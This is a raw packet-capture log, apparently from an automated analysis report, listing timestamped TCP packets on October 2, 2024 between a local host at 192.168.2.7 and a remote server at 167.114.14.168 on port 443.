                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.644141912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.644186974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.645844936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.645863056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.645950079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.645972013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.646018028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.647757053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.647775888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.647854090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.647883892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.647928953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.648809910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.648823977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.648888111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.648904085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.648945093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.711194038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.711215019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.711378098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.711417913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.711468935 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.716193914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.716209888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.716284037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.716310024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.716351986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.732062101 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.732079983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.732172012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.732198954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.732245922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.733428955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.733452082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.733520031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.733544111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.733592033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.735081911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.735099077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.735167027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.735188007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.735230923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.736025095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.736047029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.736113071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.736128092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.736171007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.737904072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.737920046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738002062 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738025904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738070011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738888025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738903999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738966942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.738985062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.739027023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.801876068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.801911116 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.801950932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.801973104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.801987886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.802135944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806699038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806718111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806751966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806766033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806777954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.806803942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823829889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823858976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823920965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823920965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823934078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823957920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823961020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823982000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.823995113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.824008942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.824032068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.824990988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825025082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825063944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825074911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825093031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825114012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825963974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.825983047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.826040030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.826050043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.826114893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827884912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827903032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827941895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827955961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827974081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.827991962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.828901052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.828917980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.828972101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.828989983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.829029083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.892518044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.892543077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.892769098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.892817974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.892878056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.897145033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.897166967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.897258997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.897294998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.897337914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.913126945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.913149118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.913336039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.913363934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.913412094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.914588928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.914608002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.914680004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.914700031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.914752960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.915591955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.915611029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.915674925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.915693045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.915734053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.916553974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.916568995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.916634083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.916656971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.916702986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.918464899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.918484926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.918545961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.918569088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.918612003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.919483900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.919502020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.919559002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.919581890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.919624090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.983190060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.983217955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.983375072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.983439922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.983491898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.987682104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.987704992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.987804890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.987840891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.987888098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.003685951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.003710985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.003829956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.003873110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.003927946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.004987001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005004883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005063057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005079985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005119085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005949020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.005965948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.006021023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.006031990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.006064892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.006984949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.007000923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.007044077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.007055044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.007091045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.008780003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.008797884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.008878946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.008896112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.008935928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009756088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009780884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009826899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009846926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009867907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.009888887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.055273056 CEST49702443192.168.2.723.109.93.100
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093081951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093111038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093177080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093209982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093228102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.093249083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094245911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094269037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094310045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094331980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094351053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.094367027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095117092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095138073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095177889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095195055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095211029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.095236063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096312046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096340895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096375942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096393108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096406937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.096431017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097362995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097381115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097441912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097453117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097462893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.097496033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.099301100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.099322081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.099392891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.099411964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.099451065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.100202084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.100219965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.100260973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.100270987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.100305080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.101141930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.101159096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.101205111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.101214886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.101249933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.183854103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.183878899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.183931112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.183960915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.183979988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184000015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184611082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184628963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184667110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184684038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184698105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.184722900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185781002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185797930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185837984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185858965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185875893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.185898066 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.186315060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.186332941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.186382055 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.186393023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.186428070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188129902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188147068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188188076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188208103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188224077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188694000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.188899040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.189100981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.189116001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.189153910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.189163923 CEST44349713167.114.14.168192.168.2.7
